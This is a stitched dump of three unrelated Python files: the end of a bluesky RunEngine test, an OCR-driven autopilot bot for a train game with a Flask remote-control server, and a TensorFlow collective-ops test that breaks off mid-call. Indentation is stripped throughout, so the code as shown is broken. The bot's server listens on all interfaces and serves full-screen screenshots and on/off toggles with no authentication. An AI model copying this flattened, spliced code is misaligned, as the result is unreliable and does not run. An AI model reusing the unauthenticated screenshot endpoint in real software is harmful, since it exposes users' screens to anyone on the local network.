def read(self):
...
obj = Dummy('broken read')
with pytest.raises(RuntimeError):
RE([Msg('read', obj)])
def test_self_describe(RE):
def inner():
cls = yield Msg('RE_class')
assert type(RE) is cls
RE(inner())
def test_thread_name(RE):
"The RunEngine event loop should be on a thread with a given name."
from ophyd.status import Status
class MockDevice:
name = "mock_device"
def trigger(self):
assert threading.current_thread().name == "bluesky-run-engine"
return Status()
d = MockDevice()
RE([Msg("trigger", d)])
|
main.py
|
import numpy as nm
import pytesseract
import re
import pydirectinput
import time
import cv2
import math
from PIL import ImageGrab
from PIL import ImageFilter
import sched
import sys
import tkinter
from tkinter import ttk, simpledialog, messagebox
from throttle import *
import requests
import logging
from win32 import win32api
import webbrowser
import ctypes
from ahk import AHK
from multiprocessing import Process, Value
import socket
from flask import Flask
from flask import render_template
from flask import request, redirect, send_file
active = Value(ctypes.c_bool, False)
newchange = Value(ctypes.c_bool, False)
def ws(active, newchange):
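    # Remote-control web server, run in a separate process. The shared
    # multiprocessing Values let the Flask routes toggle the autopilot and
    # signal the GUI process that the state changed.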
app = Flask(__name__)
@app.route('/')
def home():
return render_template("index.html", toggle=active.value)
@app.route('/status')
def status():
status = { "toggle": active.value }
return status
@app.route('/status/off')
def status_off():
active.value = False
status = { "toggle": active.value, "response": 200 }
return status
@app.route('/status/on')
def status_on():
active.value = True
status = { "toggle": active.value, "response": 200 }
return status
@app.route('/shot')
def shot():
im = ImageGrab.grab()
im.save("temp/screenshot.png")
return send_file("temp/screenshot.png", "PNG")
@app.route("/send", methods=["POST"])
def send():
newchange.value = True
form = request.form
try:
if form["switch"] == "on":
active.value = True
else:
active.value = False
except:
active.value = False
return redirect("/")
def run():
app.run(host='0.0.0.0', port='7878')
run()
if __name__ == '__main__':
root = tkinter.Tk()
photo = tkinter.PhotoImage(file="img/ap_icon_new.png")
root.title("button")
screen_width = root.winfo_screenwidth()
screen_height = root.winfo_screenheight()
w = 50
h = 50
x = 100
y = 100
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
root.lift()
root.overrideredirect(True)
root.call('wm', 'attributes', '.', '-topmost', '1')
button = tkinter.Button(root, text="button1",
image=photo, bg="orange")
button.grid(column=1, row=1, sticky=tkinter.E+tkinter.W)
root.grid_columnconfigure(2, weight=2)
try:
ahk = AHK()
except:
print("AutoHotkey was not found! Please install it in order to continue.")
exit()
continue_route = False
print("SCR-Autopilot v0.4.1-beta by MaTY")
print("Checking for updates...")
URL = "https://matyapi.matymt.repl.co/scr-autopilot/newest-version"
r = requests.get(url=URL)
data = r.json()
version = data['version']
if not version == "0.4.1":
print("Your version is outdated! Please install the latest release on https://github.com/scr-autopilot/scr-autopilot/releases")
outdatedask = messagebox.askyesno(
"SCR-Autopilot", "Your version of SCR-Autopilot is outdated. Do you want to go to the releases page to download a new version?")
if outdatedask == True:
webbrowser.open(
"https://github.com/scr-autopilot/scr-autopilot/releases")
exit()
else:
print("Your version is up-to-date.")
logging.basicConfig(filename='autopilot.log', filemode='w',
level=logging.DEBUG, format="[%(levelname)s] [%(asctime)s] %(message)s")
print("\nDisclaimer:\nSCR-Autopilot is still in a beta version so it can't handle some situations well.\nWe recommend using SCR-Autopilot on private servers.\nUSE OF THIS SOFTWARE AT YOUR RISK.\nWaiting for the user input in the dialog box.")
warningask = messagebox.askokcancel("Disclaimer", "SCR-Autopilot is still in a beta version so it can't handle some situations well.\nWe recommend using SCR-Autopilot on private servers.\n\nUSE OF THIS SOFTWARE AT YOUR RISK.", icon='warning')
if warningask == False:
exit()
display_size = ImageGrab.grab().size
logging.debug(f'Display resolution: {display_size[0]}, {display_size[1]}')
resolution = simpledialog.askstring(
"Question", "What is the resolution? (fhd, hd)")
if resolution == "fhd":
spd_pos = 884, 957, 947, 985
lim_pos = 889, 987, 942, 1016
green_pos = 1440, 983, 1441, 984
yellow_pos = 1438, 1016, 1439, 1017
double_yellow_pos = 1438, 950, 1439, 951
red_pos = 1438, 1045, 1439, 1046
distance_pos = 555, 1046, 605, 1070
awsbutton_pos = 1330, 994, 1331, 995
throttle_pos = 843, 931, 845, 1074
doors_pos = 870, 822, 871, 823
loading_pos = 781, 823, 782, 824
continue_pos = 1032, 460, 1033, 461
undershoot_pos = 709, 906, 710, 907
awaiting_pos = 862, 823, 863, 824
buzzer_pos = 824, 816, 825, 817
elif resolution == "hd":
messagebox.showerror(
"Error", 'HD resolution is not supported in this version of SCR-Autopilot. Please install v0.3.1-beta to use the HD resolution.')
sys.exit()
time.sleep(1)
spd_pos = 573, 594, 630, 630
lim_pos = 569, 627, 618, 653
green_pos = 1118, 624, 1119, 625
yellow_pos = 1120, 654, 1121, 655
double_yellow_pos = 1120, 590, 1121, 591
red_pos = 1120, 688, 1121, 689
distance_pos = 239, 686, 284, 708
awsbutton_pos = 1047, 597, 1048, 598
throttle_pos = 522, 570, 525, 713
else:
messagebox.showerror(
"Error", 'Please type only "fhd" (without the quotation marks) if you have FHD monitor, or type "hd" (without the quotation marks) if you have HD monitor.')
sys.exit()
max_speed = simpledialog.askinteger(
"Question", "What is the maximum speed of your train in MPH? (E.g. 100, 125, 75 etc.)", minvalue=1)
continue_ask = messagebox.askyesno(
"Question", "Would you like to automatically continue in the route after finsihing?")
if max_speed == None:
messagebox.showerror("Error", 'Settings incorrect. Please try again.')
exit()
if continue_ask == True:
continue_route = True
PROCESS_PER_MONITOR_DPI_AWARE = 2
MDT_EFFECTIVE_DPI = 0
def print_dpi():
shcore = ctypes.windll.shcore
monitors = win32api.EnumDisplayMonitors()
hresult = shcore.SetProcessDpiAwareness(PROCESS_PER_MONITOR_DPI_AWARE)
assert hresult == 0
dpiX = ctypes.c_uint()
dpiY = ctypes.c_uint()
for i, monitor in enumerate(monitors):
shcore.GetDpiForMonitor(
monitor[0].handle,
MDT_EFFECTIVE_DPI,
ctypes.byref(dpiX),
ctypes.byref(dpiY)
)
logging.debug(
f"Monitor {i} = dpiX: {dpiX.value}, dpiY: {dpiY.value}"
)
print_dpi()
pytesseract.pytesseract.tesseract_cmd = 'C:/Program Files (x86)/Tesseract-OCR/tesseract.exe'
time.sleep(1)
solve = None
continuing = False
ignorelim = False
ignoreaws = False
    wsask = messagebox.askyesno(
"Question", "Would you like to start a webserver so you can remotely control the autopilot?")
if wsask == True:
print("Starting the webserver...")
p = Process(target=ws, args=(active,newchange,))
p.start()
time.sleep(3)
print("\n\n\n\n\n\n\n\n\n\n\n\n\n\n")
print(""" ___ ___ ___ _ _ _ _ _
/ __|/ __| _ \___ /_\ _ _| |_ ___ _ __(_) |___| |_
\__ \ (__| /___/ _ \ || | _/ _ \ '_ \ | / _ \ _|
|___/\___|_|_\ /_/ \_\_,_|\__\___/ .__/_|_\___/\__|
|_|
""")
print("Press the red button that has appeared on your screen to engage the autopilot. You can press the button again to disengage the autopilot.")
if wsask == True:
print("\n\nFor the remote control, navigate to:", "http://" + socket.gethostbyname(socket.gethostname()) + ":7878 on a different device.","\nYou need to be on a same network to open the website.\n\n")
print("Settings:")
print("Screen resolution:", resolution)
print("Train max speed:", max_speed)
print("Automatically continue:", continue_route)
def task():
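    # Main autopilot loop, re-scheduled via root.after(): read the in-game HUD
    # with screenshots and OCR, react to AWS/signal colours, and adjust the
    # throttle toward the current speed limit.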
global solve
global continuing
global ignorelim
global ignoreaws
print("ignorelim", ignorelim)
if continue_route == True:
im = ImageGrab.grab(bbox=(continue_pos))
pix = im.load()
        continue_value = pix[0, 0]  # Get the RGB value of the pixel (tuple)
if continue_value == (255, 255, 255):
continuing = True
ahk.click(991, 470)
ahk.click(327, 833)
im = ImageGrab.grab(bbox=(awsbutton_pos))
pix = im.load()
    awsbutton_value = pix[0, 0]  # Get the RGB value of the pixel (tuple)
if awsbutton_value == (255, 255, 255):
pydirectinput.keyDown("q")
pydirectinput.keyUp("q")
print("Reset the AWS")
logging.debug(f'AWS pixel RGB: {awsbutton_value}')
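    # Estimate the current throttle setting by counting the green (0, 176, 85)
    # pixels in the throttle-bar capture and scaling the count to 0-100 %.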
cap = ImageGrab.grab(bbox=(throttle_pos))
img = cap
count = 0
bottom_throttle_pixel = None
for y in range(img.height):
for x in range(img.width):
pixel = img.getpixel((x, y))
if y == img.height - 1:
bottom_throttle_pixel = pixel
if pixel == (0, 176, 85):
count += 1
currentThrottle = int(math.floor(100 * (count / 142)))
speed = currentThrottle/100 * max_speed
if currentThrottle == 0:
logging.debug(f'Throttle pixel RGB: {bottom_throttle_pixel}')
print("Current throttle: ", currentThrottle)
if currentThrottle == None:
messagebox.showerror("Error", "I can't read the throttle")
supportask = messagebox.askyesno(
"Question", "It looks like you got an error. You can try again, but if this error persists, you can join the support server. Do you want to join the support server on Discord?")
if supportask == True:
webbrowser.open(
"https://discord.gg/jtQ2R8cxWq")
exit()
else:
# LIMIT
cap = ImageGrab.grab(bbox=(lim_pos))
cap = cap.filter(ImageFilter.MedianFilter())
cap = cv2.cvtColor(nm.array(cap), cv2.COLOR_RGB2GRAY)
tesstr = pytesseract.image_to_string(
cap,
config="--psm 7")
lim = 0
lim = [int(s) for s in re.findall(r'\b\d+\b', tesstr)]
if lim == []:
if continuing == False and ignorelim == False:
messagebox.showerror("Error", "I can't read the limit")
supportask = messagebox.askyesno(
"Question", "It looks like you got an error. You can try again, but if this error persists, you can join the support server. Do you want to join the support server on Discord?")
if supportask == True:
webbrowser.open(
"https://discord.gg/jtQ2R8cxWq")
exit()
else:
cap = ImageGrab.grab()
src = nm.array(cap)
gray = cv2.cvtColor(src, cv2.COLOR_RGB2GRAY)
gray = cv2.medianBlur(gray, 5)
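                # Speed-limit OCR failed: as a fallback, look for small
                # circular signs on screen via a Hough circle transform, OCR
                # each candidate, and press the H key when a "W" sign is seen.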
rows = gray.shape[0]
circles = cv2.HoughCircles(gray, cv2.HOUGH_GRADIENT, 1, rows / 8,
param1=100, param2=30,
minRadius=1, maxRadius=30)
if circles is not None:
circles = nm.uint16(nm.around(circles))
for i in circles[0, :]:
x = i[0] - i[2]
y = i[1] - i[2]
w = 2*i[2]
h = 2*i[2]
center = (i[0], i[1])
if w > 39:
txt = pytesseract.image_to_string(gray[y:y+h, x:x+w], config="--psm 6")
if "W" in txt:
pydirectinput.keyDown("h")
pydirectinput.keyUp("h")
cv2.circle(src, center, 1, (0, 100, 100), 3)
radius = i[2]
cv2.circle(src, center, radius, (255, 0, 255), 3)
templim = lim[0]
lim = lim[0]
lim = int(lim)
if ignoreaws == False:
im = ImageGrab.grab(bbox=(red_pos))
pix = im.load()
            # Get the RGB value of the pixel (tuple)
red_value = pix[0, 0]
im = ImageGrab.grab(bbox=(yellow_pos))
pix = im.load()
            # Get the RGB value of the pixel (tuple)
yellow_value = pix[0, 0]
im = ImageGrab.grab(bbox=(green_pos))
pix = im.load()
            # Get the RGB value of the pixel (tuple)
green_value = pix[0, 0]
im = ImageGrab.grab(bbox=(double_yellow_pos))
pix = im.load()
            # Get the RGB value of the pixel (tuple)
double_yellow_value = pix[0, 0]
if red_value == (255, 0, 0):
print("AWS:", "red")
lim = 0
if yellow_value == (255, 190, 0):
print("AWS:", "yellow")
if templim > 45:
lim = 45
if double_yellow_value == (255, 190, 0):
print("AWS:", "double_yellow")
if templim > 75:
lim = 75
if green_value == (0, 255, 0):
print("AWS:", "green")
print("Limit: ", lim)
limitThrottle = int((lim / max_speed) * 100)
print("Limit throttle: ", limitThrottle)
cap = ImageGrab.grab(bbox=(distance_pos))
cap = cap.filter(ImageFilter.MedianFilter())
cap = cv2.cvtColor(nm.array(cap), cv2.COLOR_RGB2GRAY)
tesstr = pytesseract.image_to_string(
cap,
config="--psm 6")
distance = 0
distance = [int(s) for s in re.findall(r'\b\d+\b', tesstr)]
try:
m_distance = distance[0]
distance = distance[1]
print(m_distance, distance)
            if (distance == 0 and m_distance == 0) or continuing:
im = ImageGrab.grab(bbox=(loading_pos))
pix = im.load()
loading_value = pix[0, 0]
im = ImageGrab.grab(bbox=(doors_pos))
pix = im.load()
doors_value = pix[0, 0]
im = ImageGrab.grab(bbox=(undershoot_pos))
pix = im.load()
undershoot_value = pix[0, 0]
im = ImageGrab.grab(bbox=(awaiting_pos))
pix = im.load()
awaiting_value = pix[0, 0]
im = ImageGrab.grab(bbox=(buzzer_pos))
pix = im.load()
buzzer_value = pix[0, 0]
print(buzzer_value)
if undershoot_value == (255, 255, 255):
print("UNDERSHOOT")
pydirectinput.keyDown("w")
time.sleep(0.4)
pydirectinput.keyUp("w")
if doors_value == (255, 255, 255):
print("CLOSING DOORS")
pydirectinput.keyDown("t")
pydirectinput.keyUp("t")
time.sleep(4)
continuing = False
ignorelim = False
ignoreaws = False
elif loading_value == (255, 255, 255):
print("LOADING")
elif awaiting_value == (255, 255, 255):
print("WAITING FOR GUARD")
elif buzzer_value == (255, 255, 255):
print("ACTIVATING THE BUZZER")
pydirectinput.keyDown("t")
pydirectinput.keyUp("t")
else:
print("Autopilot is currently stopping.")
pydirectinput.keyDown("s")
time.sleep(5)
pydirectinput.keyUp("s")
pydirectinput.keyDown("t")
pydirectinput.keyUp("t")
elif distance <= 20 and m_distance == 0:
if lim >= 45:
print("Slowing down to prepare for station arrival.")
ignoreaws = True
ignorelim = True
throttle(currentThrottle, int((42 / max_speed) * 100))
else:
throttle(currentThrottle, limitThrottle)
else:
throttle(currentThrottle, limitThrottle)
except IndexError:
pass
solve = root.after(600, task)
checkChanges = None
def f_checkChanges():
global checkChanges
if newchange.value == True:
newchange.value = False
if active.value == True:
button.configure(bg="green")
root.after(600, task)
elif active.value == False:
button.configure(bg="red")
try:
root.after_cancel(solve)
except:
print("Error...")
checkChanges = root.after(2000, f_checkChanges)
checkChanges = root.after(2000, f_checkChanges)
def onClick():
if active.value == False:
active.value = True
button.configure(bg="green")
root.after(600, task)
else:
active.value = False
button.configure(bg="red")
root.after_cancel(solve)
button.configure(bg="red", command=onClick)
switchask = messagebox.askyesno(
"SCR-Autopilot", 'Autopilot is set up. Do you want to turn it on now? You can also turn it on or off by using the "AP" button on your screen.')
if switchask == True:
onClick()
root.mainloop()
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
class CollectiveOpsV2(object):
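  # The V2 collective ops accept group_size/group_key/instance_key as tensors;
  # array_ops.identity() converts the plain Python ints into tensors so the
  # tensor-argument code path is exercised.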
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
if communication == 'NCCL':
self.skipTest('b/170672646: it crashes with NCCL and group size one')
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(collective_op_combinations)
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
    # Do not abort if there are no active collective ops. There could be
    # exceptions like EOF which we expect users to catch; aborting collective
    # ops on all op errors would interfere with this workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
    # Abort v1 collective ops if there are active collective ops at the time of
    # an op error. This is due to the inability to cancel collective ops; op
    # errors may cause running collective ops to hang.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
    # Do not abort v2 collective ops even if there are active collective ops at
    # the time of an op error. We rely on cancellation to terminate active
    # collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(collective_op_combinations)
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
    # This timeout comes from param resolution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
